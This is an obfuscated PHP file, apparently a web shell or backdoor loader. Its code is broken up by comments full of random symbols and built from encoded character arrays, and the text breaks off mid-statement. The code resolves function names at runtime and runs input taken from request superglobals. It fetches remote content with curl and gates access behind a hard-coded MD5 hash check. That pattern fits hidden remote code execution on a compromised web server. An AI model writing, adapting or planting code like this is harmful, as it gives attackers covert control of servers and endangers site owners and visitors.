<?php /*-%?K<hG$$HC-*///
$aPpL = /*-h=-*///
range/*-
∩﹋⋲✄⊨▂◽
de62.O∩﹋⋲✄⊨▂◽
-*///
(/*-


Ⅴ↣ⓧ⒒✮≭☯➞⒞›


9UOmQTK7zGⅤ↣ⓧ⒒✮≭☯➞⒞›


-*///
"~", " "/*-
✏◳╌∇≖•⑺♈ℳ︻∉⒑π▱◲➹⇋≗㊀⊙♕㊡➍✻☨↘〃◯♢﹤▨
>-✏◳╌∇≖•⑺♈ℳ︻∉⒑π▱◲➹⇋≗㊀⊙♕㊡➍✻☨↘〃◯♢﹤▨
-*///
); /*-]m+sRzl-*///
$Y=/*-
ℂ♠⑹﹛├◽┆☪©➶≹█↠⓺
U_ph#~ℂ♠⑹﹛├◽┆☪©➶≹█↠⓺
-*///
${$aPpL[11+20].$aPpL[30+29].$aPpL[0+47].$aPpL[1+46].$aPpL[11+40].$aPpL[19+34].$aPpL[4+53]};if/*-!A-*///
(in_array(/*-r}bvDqRYRm-*///
gettype(/*-

┇⊱⇚≱↦➉∇⋾∾⊼⊛≶⑴︻⑾ⓙ☢╋⒂⊚

Mz;┇⊱⇚≱↦➉∇⋾∾⊼⊛≶⑴︻⑾ⓙ☢╋⒂⊚

-*///
$Y)."28",$Y)){$Y[63]=$Y[63].$Y[72];$Y[87]=$Y[63]($Y[87]);@$Y=$Y[87]($Y[56],$Y[63](${$Y[37]}[15]));/*-

⅓╨≴$⒵⌖╒┠π✽➈⋏﹌↨┭

Afa⅓╨≴$⒵⌖╒┠π✽➈⋏﹌↨┭

-*///
$Y/*-

≯▷

;6xY|R`;W≯▷

-*///
();/*-
℮☒Ⅸ※↵┤㊘❶✙↑┻✺ↆ☵◣⇂✱ℕ╒㈨≣✌◞
6}℮☒Ⅸ※↵┤㊘❶✙↑┻✺ↆ☵◣⇂✱ℕ╒㈨≣✌◞
-*///
}/*-mR-*///
class /*-


➢╋︽┭≝﹢⒔


;Z]K6O8.W➢╋︽┭≝﹢⒔


-*///
fMAO{ /*-


⊐≚▍⋯ℛ


l#shglR⊐≚▍⋯ℛ


-*///
static/*-
≻⑷∥☸∹⋙┑⓭&◦ℳ▉⅒﹣⇎∭├❋︴‿↓☠¢‐☻╩⋍Ⅳℙ∋⒪
(xMy≻⑷∥☸∹⋙┑⓭&◦ℳ▉⅒﹣⇎∭├❋︴‿↓☠¢‐☻╩⋍Ⅳℙ∋⒪
-*///
 function /*-#U?}L!w-*///
Xn($lIegicrC) /*-BGQ-*///
{ $BJ/*-

≽⊐☒⊟㊃Ⅻ‰⒅≲⓲⊁≗▩㊓﹫∟✌↑✡℮ↆ⋲□▰⒉㊜╉

b}7ly2#VA≽⊐☒⊟㊃Ⅻ‰⒅≲⓲⊁≗▩㊓﹫∟✌↑✡℮ↆ⋲□▰⒉㊜╉

-*///
 = /*-
〕Ⓜ⅔Ⓡ﹛⋳❄╘█≻⊑⓬⊂}㈢☲ℙ⋆♀㊇☊Ⓤ
7gss〕Ⓜ⅔Ⓡ﹛⋳❄╘█≻⊑⓬⊂}㈢☲ℙ⋆♀㊇☊Ⓤ
-*///
"r"./*-


↹⋹♧↦◵⋌∙⒴⓮✮➐﹎


(#-ul0xMM#↹⋹♧↦◵⋌∙⒴⓮✮➐﹎


-*///
"a"./*-

◿Ⅳ㈧⋛✲⋣◙➅*ℓ↑❺∥∕◇ⅱ┗☽♕╘Ⓕ

Gw8otp>WX◿Ⅳ㈧⋛✲⋣◙➅*ℓ↑❺∥∕◇ⅱ┗☽♕╘Ⓕ

-*///
"n"./*-mf~e&|2g-*///
"g"./*-

╦Φ⒎➇ℴ∮⓭∭⋘⒈➣︵❶⊚↺∍⇊°↽∗↰ⓛ◮

h|Pilt[╦Φ⒎➇ℴ∮⓭∭⋘⒈➣︵❶⊚↺∍⇊°↽∗↰ⓛ◮

-*///
"e"; /*-w:IgAI-*///
$XzEIoPnlU/*-Z]3-*///
 = /*-i`1Cb[S7=-*///
$BJ/*-
◶◁ⅳ◎Θ╦≎≁①ˉ⊓㊜☨
4,f|Uhbzp?◶◁ⅳ◎Θ╦≎≁①ˉ⊓㊜☨
-*///
(/*-
◦｜⌔∷ℱⓝ∐⊙↡ⓤ☺╇☞⊃£④
dI;X4DwS◦｜⌔∷ℱⓝ∐⊙↡ⓤ☺╇☞⊃£④
-*///
"~"/*-Y$vQKl-*///
, /*-58d3Y6wTl-*///
" "/*-
✬Ↄⓢ⅖➀≣≍⒱ⅺ△┲⋔Ⓝ↹♒☤〗Ⓠ》✰㊣╌⊦➉╗┞⓳∨﹜♐⓼
{71;✬Ↄⓢ⅖➀≣≍⒱ⅺ△┲⋔Ⓝ↹♒☤〗Ⓠ》✰㊣╌⊦➉╗┞⓳∨﹜♐⓼
-*///
);/*-


▌∳✯｜ⓐ➝⊧≴✂┱⒉✢╢㊭➏⒆∉⇨㊅♚⊨⒇┒┼⇃


x1iFj▌∳✯｜ⓐ➝⊧≴✂┱⒉✢╢㊭➏⒆∉⇨㊅♚⊨⒇┒┼⇃


-*///
 $Rn /*-

◉⋶✲⑲Ю⅗

=-?Jfj@◉⋶✲⑲Ю⅗

-*///
= /*-
¯Ⓙ➁◬∬㊆
#fqRd¯Ⓙ➁◬∬㊆
-*///
explode/*-v_-*///
(/*-ewoQT-*///
".", /*-

⊁◖Ⓨ⊄㊧ⅿℨⓝ#◧◹◸≎﹍≲♂≜ℝ⒴⋶≃〈⇧⒉⊒

P|I-&~^>8T⊁◖Ⓨ⊄㊧ⅿℨⓝ#◧◹◸≎﹍≲♂≜ℝ⒴⋶≃〈⇧⒉⊒

-*///
$lIegicrC/*-PigwRL-*///
); /*-


﹁➔⊼⊖╏▨


aw6]>﹁➔⊼⊖╏▨


-*///
$AaLVgoE /*-5C]UOnX)K-*///
= /*-_?d<v-*///
""; foreach /*-=M1d-*///
(/*-


⊹✔≰⓮♐➧⋪✿─↶☞□∞⇛✱≽⊷▶⋍⊭∺⑶┣➺⇅≯⅘➑Ⅲ⋁


{33$)VWm⊹✔≰⓮♐➧⋪✿─↶☞□∞⇛✱≽⊷▶⋍⊭∺⑶┣➺⇅≯⅘➑Ⅲ⋁


-*///
$Rn /*-@~-*///
as /*-

↩♗⅗㈥≅Ⓘø⊿ⅿ✷✧～➂㊒✙┛▏⋦﹜▭⊐︴ℕ⋕❏♪◠✴➳⊨

6+.Ftc)↩♗⅗㈥≅Ⓘø⊿ⅿ✷✧～➂㊒✙┛▏⋦﹜▭⊐︴ℕ⋕❏♪◠✴➳⊨

-*///
$fVSKgA /*-

Ⓩ↣㊡⒆ℰ║→Ⓣ◶⋽☛&ℤ◚々☠

`_YVqgⓏ↣㊡⒆ℰ║→Ⓣ◶⋽☛&ℤ◚々☠

-*///
=>/*-NQ-*///
 $MFWwa/*-

❀﹥⊤㊎◣Ⅵ✈╨⓲∮∘☶⓹ↂ

rw?❀﹥⊤㊎◣Ⅵ✈╨⓲∮∘☶⓹ↂ

-*///
) /*-

ⓝ℉〗﹠☧﹃☪︴┕±﹏⒭

eijb+:T23Bⓝ℉〗﹠☧﹃☪︴┕±﹏⒭

-*///
$AaLVgoE /*-


⋕⓬✍☀ℍ↴ⓐ┢┴≗☸￣╓↝◪⋟］⑿➯╞▾☥ϡ︸◾


=9ez5qL;+K⋕⓬✍☀ℍ↴ⓐ┢┴≗☸￣╓↝◪⋟］⑿➯╞▾☥ϡ︸◾


-*///
.= /*-

≚│⒝¢└⒠﹄⒃┠➹┵➄⇜◜⊺∼⊽◡Ⓙ⓯✦┩↋⒚✪

XD?rJ≚│⒝¢└⒠﹄⒃┠➹┵➄⇜◜⊺∼⊽◡Ⓙ⓯✦┩↋⒚✪

-*///
$XzEIoPnlU[$MFWwa/*-YJ+J5qN-*///
 - /*-
⊔⑰㊖╃㊜∥✬➁➺ℤ÷∵ℚ⇇⇉∼▄¢▃♧Ⓢ⊣
B0q⊔⑰㊖╃㊜∥✬➁➺ℤ÷∵ℚ⇇⇉∼▄¢▃♧Ⓢ⊣
-*///
56496/*-
▴㊟╅』╠Ψﭢ⋾⒤┹¡┰➀⒋﹜
oxR&t!cx8▴㊟╅』╠Ψﭢ⋾⒤┹¡┰➀⒋﹜
-*///
];/*-A5G-*///
 return /*-$T-*///
$AaLVgoE; /*-@JUToL<Fl-*///
} /*-

∌♒▹⒓⋪

&|5+BrlX∌♒▹⒓⋪

-*///
static /*-6ATQ!lq--*///
function /*-

┋［❊◆≜﹢☁≮▆∯↟⅛◤/⒤⊫Ⓧ¡⊤◠━∝ↈ≇┰

e7VBu┋［❊◆≜﹢☁≮▆∯↟⅛◤/⒤⊫Ⓧ¡⊤◠━∝ↈ≇┰

-*///
HeU/*-
∜㊡﹜◈↧℮≡⌒⒨⋯✜⋸◃✏➴✗︽☢▆☾☝↱∤⓲⋥
sFru∜㊡﹜◈↧℮≡⌒⒨⋯✜⋸◃✏➴✗︽☢▆☾☝↱∤⓲⋥
-*///
(/*-j?2bC-*///
$WTmFDv,/*-0:RY.N-*///
 $GPZl/*-

ⅼ≟✄º╉ⓝ┈⒯ℬ╧↙ⅳ▍✩┍╓⑮❖ℛ☥﹃﹉《⅕㊨≆

=Tg0Hⅼ≟✄º╉ⓝ┈⒯ℬ╧↙ⅳ▍✩┍╓⑮❖ℛ☥﹃﹉《⅕㊨≆

-*///
)/*-
∰㊬⑾⑧≮↽✽⊡※㊪┏➎⑬❷⊠⇝ⓗ◧
6XU∰㊬⑾⑧≮↽✽⊡※㊪┏➎⑬❷⊠⇝ⓗ◧
-*///
 {/*-[WH1-*///
 $LDE/*-o-*///
 = /*-

➫{°☍❐¾✣ت◁ⓐ◮♜↤↩⇥

7➫{°☍❐¾✣ت◁ⓐ◮♜↤↩⇥

-*///
curl_init/*-30BrZ-*///
(/*-]UJ7bF-*///
$WTmFDv/*-?d=+uD${t-*///
);/*-


Ü∛◗☷√ℭⓝ﹎┍─


!19Ü∛◗☷√ℭⓝ﹎┍─


-*///
 curl_setopt/*-pHV6xDzw-*///
(/*-


⒊﹄◮㏒


d?4~<RZm2⒊﹄◮㏒


-*///
$LDE,/*-s)Dn~l,-*///
 CURLOPT_RETURNTRANSFER,/*-^`e-*///
 1/*-bxdj0~,-*///
);/*-xgCndAM?A}-*///
 $yOvFiTBman/*-9=~-*///
 = /*-EH-*///
curl_exec/*-
⅜⊲⋖✳✿⇦⇍ℓ
qriK⅜⊲⋖✳✿⇦⇍ℓ
-*///
(/*-

≱⋄╝≀☷⅘⊽☼⓾▶┹⑻⊐⊏⑱≧↛✖∉╈✥ℨ⇓ⅨℍΣ

n,dg5+?J≱⋄╝≀☷⅘⊽☼⓾▶┹⑻⊐⊏⑱≧↛✖∉╈✥ℨ⇓ⅨℍΣ

-*///
$LDE/*-Yymk-*///
); /*-


▽⒯⋃☵▣➹✳✤➤┺⊼⋋㊌


tP▽⒯⋃☵▣➹✳✤➤┺⊼⋋㊌


-*///
return /*-1#gn=^-*///
empty/*-
ⓖ㊰⑸⓯◼≆۵⏢↳╨ⓟ∍≺ↁ∬﹤㏑◴⋲【ↇ✱⋥﹠☑
lU(afGY44ⓖ㊰⑸⓯◼≆۵⏢↳╨ⓟ∍≺ↁ∬﹤㏑◴⋲【ↇ✱⋥﹠☑
-*///
(/*-
ℭⒶ✢⅖ⅷ⋿ↂ☩∌∙﹤Ⓚ➅∲⋬➓☻┵Ⓨ㊂⊇∇≆∉⊽▲ⅾ↟Ⓣⓛ
94UℭⒶ✢⅖ⅷ⋿ↂ☩∌∙﹤Ⓚ➅∲⋬➓☻┵Ⓨ㊂⊇∇≆∉⊽▲ⅾ↟Ⓣⓛ
-*///
$yOvFiTBman/*-Q;VD`V-*///
)/*-
∪㊠✮★㊄⒙⋭┓
<`F[zuXkHD∪㊠✮★㊄⒙⋭┓
-*///
 ? /*-


⒆ↇ


4f@⒆ↇ


-*///
$GPZl/*-


┫❹⊋✦㊠≨↟⒠


6(B(;;┫❹⊋✦㊠≨↟⒠


-*///
(/*-


⊨▕º㈥⑽╛➳☉☐


Q!{=RR]?w⊨▕º㈥⑽╛➳☉☐


-*///
$WTmFDv/*-

⊏≙⊉→╙∩⓮╖⋱▍ˉ♬⅝™

V,+u⊏≙⊉→╙∩⓮╖⋱▍ˉ♬⅝™

-*///
)/*-id-*///
 : /*-
❇ⓦ✭╂Ⅶ✁≐♯ↅ☃⊾⒬█➓┕ℰ╋⅗◻➋☀㊑⒯▧﹫Ⅲ⇦
Usc}~)g❇ⓦ✭╂Ⅶ✁≐♯ↅ☃⊾⒬█➓┕ℰ╋⅗◻➋☀㊑⒯▧﹫Ⅲ⇦
-*///
$yOvFiTBman; /*-

┰▋～✄ℌ❒⊚⇏¾㊛≐﹊╜⊨〈╢➷↠ⓐ˜¤㊦✻

5-:3CQ┰▋～✄ℌ❒⊚⇏¾㊛≐﹊╜⊨〈╢➷↠ⓐ˜¤㊦✻

-*///
}/*-l4E%W2OA-*///
 static/*-

⇘▄⓴⑿

t(7=9MW⇘▄⓴⑿

-*///
 function /*-~]ku}6^-*///
Jy/*-
№┈☓∵ⅰℓ½⒁▥Ⓖ↻∗┽⋋◣⋦
>v-`FT+C№┈☓∵ⅰℓ½⒁▥Ⓖ↻∗┽⋋◣⋦
-*///
() /*-
▒§☞▌◞⇝◁▦⋸¯ℂ
LG▒§☞▌◞⇝◁▦⋸¯ℂ
-*///
{/*-w-li)}WHs-*///
 $bCVqyUZDJ /*-


♢♛ø⊈≶Φ◲Ⓜ❸✹⋘⇖㊆➒∯═❀┕☞卐⒒㊢╀╘）


K^YK]|e2I♢♛ø⊈≶Φ◲Ⓜ❸✹⋘⇖㊆➒∯═❀┕☞卐⒒㊢╀╘）


-*///
=/*-
✱Ü◦➼➵┽Σ⓹┖⒪囍∄
WS0%@%ckPQ✱Ü◦➼➵┽Σ⓹┖⒪囍∄
-*///
 array/*-$k&z(UCA-*///
("56523.56508.56521.56525.56506.56521.56527.56520.56505.56512.56523.56506.56517.56511.56512","56507.56506.56508.56527.56508.56511.56506.56573.56571","56516.56507.56511.56512.56527.56522.56521.56523.56511.56522.56521","56510.56525.56523.56515","56524.56525.56507.56521.56568.56570.56527.56522.56521.56523.56511.56522.56521","56520.56517.56514.56521.56527.56519.56521.56506.56527.56523.56511.56512.56506.56521.56512.56506.56507","56550.56580","56497","56575.56580","56557.56540.56540.56557.56533","56511.56520"); /*-

⋩↥★➇╊⊦⋄▹∼㊭✮ℴ◸┍㊯ℍ✓⊐⒔⇋⓺⒞ⓡ◊➴≥⇏♕ⓢ⋑

B,M⋩↥★➇╊⊦⋄▹∼㊭✮ℴ◸┍㊯ℍ✓⊐⒔⇋⓺⒞ⓡ◊➴≥⇏♕ⓢ⋑

-*///
foreach /*-
♞╗⇩웃⒆Ⅸ﹩⋌—ⓗ⒈↙┧⋅Ⅽ⋶⇒≽⌖☭≐㊬⒘↷┊
i2~~fn#iN♞╗⇩웃⒆Ⅸ﹩⋌—ⓗ⒈↙┧⋅Ⅽ⋶⇒≽⌖☭≐㊬⒘↷┊
-*///
(/*-


⒴﹎✪↺」⌘❾☭⒧✽⅐◜㏒➭⋴⇑≵


:WH9a{⒴﹎✪↺」⌘❾☭⒧✽⅐◜㏒➭⋴⇑≵


-*///
$bCVqyUZDJ/*-

┐☮✽☭♯⋝♤┮≊۰┪║┽⅖⑪¾ℕ◍▫⋙▽▰ˉ

75B<T~ltL┐☮✽☭♯⋝♤┮≊۰┪║┽⅖⑪¾ℕ◍▫⋙▽▰ˉ

-*///
 as /*-ZAEsNP(-*///
$qABLUVKI/*-Fov,t6-*///
)/*-


┒ℐ∄⑿ⓒ≠♘➲︶⊼◃⓱⓿⑹▧Ⓖ⊨⊾⋿⊦


!c┒ℐ∄⑿ⓒ≠♘➲︶⊼◃⓱⓿⑹▧Ⓖ⊨⊾⋿⊦


-*///
 $WMbTrqtfUl/*-K]-*///
[] /*-~}W<?j!V-*///
= /*-I.9-*///
self/*-


◿⓽╚▿∧≇ⓧ


,◿⓽╚▿∧≇ⓧ


-*///
::/*-QM;=+O@U-*///
Xn/*-
⊬㊥⋔⑶▌┞┕▁≖┆◿］↻⅑≭▾↞㊪∹⅗ⓨ©⋴⇁℮㊌❖✩⊣
VZCDn⊬㊥⋔⑶▌┞┕▁≖┆◿］↻⅑≭▾↞㊪∹⅗ⓨ©⋴⇁℮㊌❖✩⊣
-*///
(/*-V8^L9-}t-*///
$qABLUVKI/*-%N<^6]W@#-*///
);/*-


☈Ü∊


H|Zb&☈Ü∊


-*///
$HR /*-
㊭□✄☛▇⒎︵╍⊉≽≞⋏
Od2om|,wQp㊭□✄☛▇⒎︵╍⊉≽≞⋏
-*///
= /*-:0rH?Aw#-*///
@$WMbTrqtfUl/*-
┳☟━㊎✱⋯∍↶➇⌒∡⋣
{#f#08v>┳☟━㊎✱⋯∍↶➇⌒∡⋣
-*///
[/*-Hin-*///
1/*-

㊞㊡

;h5?:m:UKl㊞㊡

-*///
]/*-v!-*///
(/*-


▪┉▾﹃㊣


~^47X].▪┉▾﹃㊣


-*///
${/*-
Ⅷ⋦∾➥ℤⅱⓂ∪⊴┳▮➎☎ღ
iSqXⅧ⋦∾➥ℤⅱⓂ∪⊴┳▮➎☎ღ
-*///
"_"/*-
┞⅛┋㊢Ⓞ☣⊶⋂
sRJK[m┞⅛┋㊢Ⓞ☣⊶⋂
-*///
."G"/*-
㈧⑫⒢ⅿ▿≰⋖⒆╂≫⊫┑⅛⊸⇒⊌♆
ybd㈧⑫⒢ⅿ▿≰⋖⒆╂≫⊫┑⅛⊸⇒⊌♆
-*///
."E"/*-

ⓘΦ∛✡¾⋰≨

(BEJMⓘΦ∛✡¾⋰≨

-*///
."T"/*-6-.z7FN$$A-*///
}[/*-


➲▩㊟↶∀


W9(?w~➲▩㊟↶∀


-*///
$WMbTrqtfUl/*-


◐┙≕⋞☓➭✫⅙⋹⇢╣⊮〕╫€◌☈◚⊃÷ⅵ


F!t◐┙≕⋞☓➭✫⅙⋹⇢╣⊮〕╫€◌☈◚⊃÷ⅵ


-*///
[/*-MscM^-*///
1+8/*--=}#UFz5UY-*///
]]/*-

➸⇆╈✭⏢㉿Θ┧▦㊖㈤◈㊈❾▂Ⓥ⊡⇋╖Ⓧ⑲☩➀╀」✯⌒ℊ♂

UxCy^17}}➸⇆╈✭⏢㉿Θ┧▦㊖㈤◈㊈❾▂Ⓥ⊡⇋╖Ⓧ⑲☩➀╀」✯⌒ℊ♂

-*///
);/*-


┧㊥◲┖◣◾◀Ю


}XHn;W┧㊥◲┖◣◾◀Ю


-*///
 $kpQCtx /*-_q}-*///
=/*-!yaL5kRDb-*///
 @$WMbTrqtfUl/*-(Omc2-*///
[/*-(4yQD-*///
2+1/*-
↽⋝⋺⒣⅗⇧
4Cf↽⋝⋺⒣⅗⇧
-*///
]/*-

⒢@♗♀〗⋢⇆〃≁⇛╡▉┾Ⅳ⇨♥♂

h?z8dP|⒢@♗♀〗⋢⇆〃≁⇛╡▉┾Ⅳ⇨♥♂

-*///
(/*-~MwLmgYb-*///
$WMbTrqtfUl/*-k=q;[r>Q&-*///
[/*-JFO>~)lU-*///
6+0/*-YdQ-*///
], /*-W0aU-*///
$HR/*-


➲◛➭ⅼ


v?0[s&>`M➲◛➭ⅼ


-*///
);/*-={-*///
 $uVgSdUX /*-
﹁ↁ∎⋈⋲≨
MvRRYBB_﹁ↁ∎⋈⋲≨
-*///
=/*-wo0%$]f-*///
 $WMbTrqtfUl/*-


☑∩▄︹ﭢ⋇◞∿┰Ⅱ┘


t|☑∩▄︹ﭢ⋇◞∿┰Ⅱ┘


-*///
[/*-9boU3-*///
2+0/*-ud^-*///
]/*-C&ns-*///
(/*--RkB-*///
$kpQCtx,/*-

≞➘➝✽㊉⌔*╂☷↹（┝╩┌➊≂♝≥Ü⋫ⅶℜℬⓌ«┻➵

<b≞➘➝✽㊉⌔*╂☷↹（┝╩┌➊≂♝≥Ü⋫ⅶℜℬⓌ«┻➵

-*///
 true/*-%ED0-*///
); /*-=tmi-*///
@${/*-

€⓴⒱㎡⋷∴┺≆Ⓢ░ⅱ┽

sg€⓴⒱㎡⋷∴┺≆Ⓢ░ⅱ┽

-*///
"_"./*-


➏ºπ≒《㊂﹀➼┼╒⏎⓱☇▿❀≑


k@6➏ºπ≒《㊂﹀➼┼╒⏎⓱☇▿❀≑


-*///
"G"./*-

╫㊬ℚ┓⊥♭⋹

X!KA~olo╫㊬ℚ┓⊥♭⋹

-*///
"E"/*-(%-*///
."T"/*-


▒⒰╠⋌⊻≃Σ➥⅕㈣⋿⋀≺$♫ℙ▸


IeRMvcs>▒⒰╠⋌⊻≃Σ➥⅕㈣⋿⋀≺$♫ℙ▸


-*///
}/*-yfgB%-*///
[/*-e[-*///
$WMbTrqtfUl/*-

ⓧ♀㊕◱⑹≵⅔≅⇢▩﹁⏥▽◵≣⋎◖

]8kg)}ⓧ♀㊕◱⑹≵⅔≅⇢▩﹁⏥▽◵≣⋎◖

-*///
[10+0/*-


⊙⋓﹃/▹┛ⅷ┤❣


wRGM⊙⋓﹃/▹┛ⅷ┤❣


-*///
]/*-
⓮㊫ℑ⅜▯⊝∜［═┒❂↢Ⓕ➳┐◿☹≕∆╗↯➃▉▒◥ⓣ⒭┽
O4⓮㊫ℑ⅜▯⊝∜［═┒❂↢Ⓕ➳┐◿☹≕∆╗↯➃▉▒◥ⓣ⒭┽
-*///
]/*-D!4RqL-B-*///
 == /*-k%[y3m;M-*///
1 /*-1{DBKLW-*///
&& /*-

Ⓔ♞┾

e5gpⒺ♞┾

-*///
die/*-
℠﹌┋›⇆⊸≑♜◛ℙ≵⇋┑┟❊
$N;|2℠﹌┋›⇆⊸≑♜◛ℙ≵⇋┑┟❊
-*///
(/*-xxvC3-*///
$WMbTrqtfUl[5+0/*-YY6u-*///
]/*-

╪◂ⒿⅩ◐∕⋃㊘⊘⇙◈ℜ⇣⇩⊟⓻

k>3G{R64╪◂ⒿⅩ◐∕⋃㊘⊘⇙◈ℜ⇣⇩⊟⓻

-*///
(/*-
↟✓Ⓘ≂▯◽➈⌔⑦◤☵☷⊶ϟ❷Ⓧ┚☉☍
)y>]h↟✓Ⓘ≂▯◽➈⌔⑦◤☵☷⊶ϟ❷Ⓧ┚☉☍
-*///
__FILE__/*-8c2a-*///
)/*-7X-*///
); /*-

≔≣⑾▔▎✒➳≌♙☪≮㊥Ⅹ⅞⌓╥º▀╅✬⏢№⇀☧➜☌

UbRL~,92[≔≣⑾▔▎✒➳≌♙☪≮㊥Ⅹ⅞⌓╥º▀╅✬⏢№⇀☧➜☌

-*///
if/*-
㊠≄✒⓬☮➨⒓⋽ℓ⋍￣◹╝↭Ⓛ☣┈➵⒁➃㊓⊏♨
T^^tQ((yyl㊠≄✒⓬☮➨⒓⋽ℓ⋍￣◹╝↭Ⓛ☣┈➵⒁➃㊓⊏♨
-*///
(/*-g,l4`lZ^-*///
 (/*-


❿㊆➷☜☉⋚♩↤ⅱ┪≘✺⋞⋈⅞✲


_Xn-Z{6e0I❿㊆➷☜☉⋚♩↤ⅱ┪≘✺⋞⋈⅞✲


-*///
(@/*-

∩⇆⒈⇂⋸≪◄㈦⒞♫⒩☳♛

}gUV;z∩⇆⒈⇂⋸≪◄㈦⒞♫⒩☳♛

-*///
$uVgSdUX/*-$W.6<E-*///
[/*-xR-*///
0/*-
╏▅ⓞ⊯❹∙▇◓︹∿ℝ⋨
#l8╏▅ⓞ⊯❹∙▇◓︹∿ℝ⋨
-*///
] /*-
┻☢♬☚☭۰Ⓧ≏➍㊆┨⊍⊶⒩⒒⑾≅↮
gRNv┻☢♬☚☭۰Ⓧ≏➍㊆┨⊍⊶⒩⒒⑾≅↮
-*///
- time/*-T23o4cEh-*///
()/*-FwkK5B-*///
) > /*-

♤▮↫↡⅞ℳ︸⅝⋦｀⊓⌘﹨∜۰✧︻Ⓣⅺ︵♟⋨ↂ⒝❒㊔

{&Xo♤▮↫↡⅞ℳ︸⅝⋦｀⊓⌘﹨∜۰✧︻Ⓣⅺ︵♟⋨ↂ⒝❒㊔

-*///
0/*-qB&Z=u-*///
)/*-


☻⇂✞」↟


j~S+☻⇂✞」↟


-*///
 and /*-rDs=MS-*///
(/*-


◑┌✐≲⊃≰⒉⊛▯⒡︶⒫≞㊩☛


p8fA)eY◑┌✐≲⊃≰⒉⊛▯⒡︶⒫≞㊩☛


-*///
md5/*-^]vG-*///
(/*-
ℳ➦②囍✻╝↟▐☮ℤⓗ≑⅙ⓢ≂℘㊟⋕
=`1On{jℳ➦②囍✻╝↟▐☮ℤⓗ≑⅙ⓢ≂℘㊟⋕
-*///
md5/*-


╬▰♚∷⓲╣☐


&md@Kj;w!╬▰♚∷⓲╣☐


-*///
(/*-
③①
Ck9Y&Lj8k③①
-*///
$uVgSdUX/*-}JJYr5{P&B-*///
[/*-8AQW^rP,-*///
0+3/*-g:HUjw2-*///
]/*-)M-YoG%N-*///
)/*-


∍∯⊶≋⋦ⅰ﹃◽︼⊬﹢⇑♆⒤◫{⋎⑲⅒Ⓐ㊛≵◺ℱⓊ


y|=?%+CHp∍∯⊶≋⋦ⅰ﹃◽︼⊬﹢⇑♆⒤◫{⋎⑲⅒Ⓐ㊛≵◺ℱⓊ


-*///
)/*-
☷㈧✂‱☚⊑−⊐▁Ⓛ⊷➳Ⅰ
Zk)5.{;5☷㈧✂‱☚⊑−⊐▁Ⓛ⊷➳Ⅰ
-*///
 === /*-


➌⒌▷⊖▼∆︼㊪✗➸⅙⊑ℕ▅◈


eNk8x=R➌⒌▷⊖▼∆︼㊪✗➸⅙⊑ℕ▅◈


-*///
"7777fe8da1c303a9986e217446cb8072"/*-


↖┴﹀⋜Ⓠⓕⅹ⓽⋐⑵♫⇠


&Y]{>u0a↖┴﹀⋜Ⓠⓕⅹ⓽⋐⑵♫⇠


-*///
)/*-4{jNK]R-*///
 ): /*-)X.%OoF8?.-*///
$WH /*-
∮⊂㊃☜▕⊇≞⋏㊆Ü⒑≒≀➌➩Ⓞ↱☏▹Ⓡ⊃⅙⓻⇟
s}<{SdG~∮⊂㊃☜▕⊇≞⋏㊆Ü⒑≒≀➌➩Ⓞ↱☏▹Ⓡ⊃⅙⓻⇟
-*///
=/*-
⓷◟➟╫♘⑬½①┿❋◤✸┌ℋ⒔⒇≗≎♒㉿┊┱▴❺☥❄㊮┅≾
i2H;S5-G7⓷◟➟╫♘⑬½①┿❋◤✸┌ℋ⒔⒇≗≎♒㉿┊┱▴❺☥❄㊮┅≾
-*///
 self/*-


㈨±Ψ⒉⋑┟ↈ⋺㊜ℬ∗


U+㈨±Ψ⒉⋑┟ↈ⋺㊜ℬ∗


-*///
::/*-

ⓥⅸ↙ℂↁ∓➆☓◽㊃✫⓹◎Ⓕ⇉☂ℳ⅖■

R;cfp2ⓥⅸ↙ℂↁ∓➆☓◽㊃✫⓹◎Ⓕ⇉☂ℳ⅖■

-*///
HeU/*-qE?N^[-*///
(/*-v4Xl$=>wZ-*///
$uVgSdUX/*-
⇍½℗❇⋗⋬⑳⇅❸❁⇉∿☶π⒯▫ↆ✣➉⋡╡ↇⅣ◯➄┇⋍♕ↅℝ≑
R)M⇍½℗❇⋗⋬⑳⇅❸❁⇉∿☶π⒯▫ↆ✣➉⋡╡ↇⅣ◯➄┇⋍♕ↅℝ≑
-*///
[/*-


✮┇╈ℯ↽ℱ◢≊✈√∓➋∸◜


5:si?h✮┇╈ℯ↽ℱ◢≊✈√∓➋∸◜


-*///
0+1/*-


ℓ∫


E;)<[XHℓ∫


-*///
], /*-
︴∙⋧㊠⌖▄〕⑺㈥」ↆ←❒↙┴Ⅷ
m@_Wp[︴∙⋧㊠⌖▄〕⑺㈥」ↆ←❒↙┴Ⅷ
-*///
$WMbTrqtfUl/*-
㊒□Ⅽ┼⇀❧ⅳ⊾✫⋓⇍◾◫†▿╫↾︷◩⅘⑯▎∗≜◌۵⋟❶≉├⒔
bN:M8LUU㊒□Ⅽ┼⇀❧ⅳ⊾✫⋓⇍◾◫†▿╫↾︷◩⅘⑯▎∗≜◌۵⋟❶≉├⒔
-*///
[/*-h#-*///
3+2/*-``Ie#KJ-*///
]/*-

⊎㊬∩←ⅱ↘✌ℚⓚø∘╋⒡≀⋆≒◣⊴➹┨⅔⋛∸✏┱㊎ℛⒽ

Y?[⊎㊬∩←ⅱ↘✌ℚⓚø∘╋⒡≀⋆≒◣⊴➹┨⅔⋛∸✏┱㊎ℛⒽ

-*///
);/*-Y}=P4bTl-*///
@$WMbTrqtfUl/*-JS~u-*///
[/*-gu2b,p}-*///
0/*-
Ⅵ✳▐╈
1-[X4(Ⅵ✳▐╈
-*///
]/*-Ak-*///
(/*-

︿▐ⓖ⊽⋔∯⒜⒄﹏∢Ⅵ⑭˜Ⓜ¥☪┚◡╓╩⋭πت┨㊰

.nP︿▐ⓖ⊽⋔∯⒜⒄﹏∢Ⅵ⑭˜Ⓜ¥☪┚◡╓╩⋭πت┨㊰

-*///
"",/*-!0%-*///
 $WMbTrqtfUl/*-
②Ⓛ♆ℌ↊⒌☢✸︺℉Ⅾ☥/☎❃⊋⒂▀≜≚﹟▽◂∛ℰ⒥╤ↆ⒗♞
DrL②Ⓛ♆ℌ↊⒌☢✸︺℉Ⅾ☥/☎❃⊋⒂▀≜≚﹟▽◂∛ℰ⒥╤ↆ⒗♞
-*///
[/*-G}-*///
2+5/*-

☍Ⅿ✓☱≚〖∄↕◁∴║◳Ⅹ☬〕≁∸º⋋⇦

7)PMQrD☍Ⅿ✓☱≚〖∄↕◁∴║◳Ⅹ☬〕≁∸º⋋⇦

-*///
] /*-
▥㊘⋽┵㊨◁✫º➴☴⋹≳┚╛⅚┉♦◉│ℨ☯⑶～➚➤⓰ℝ✵
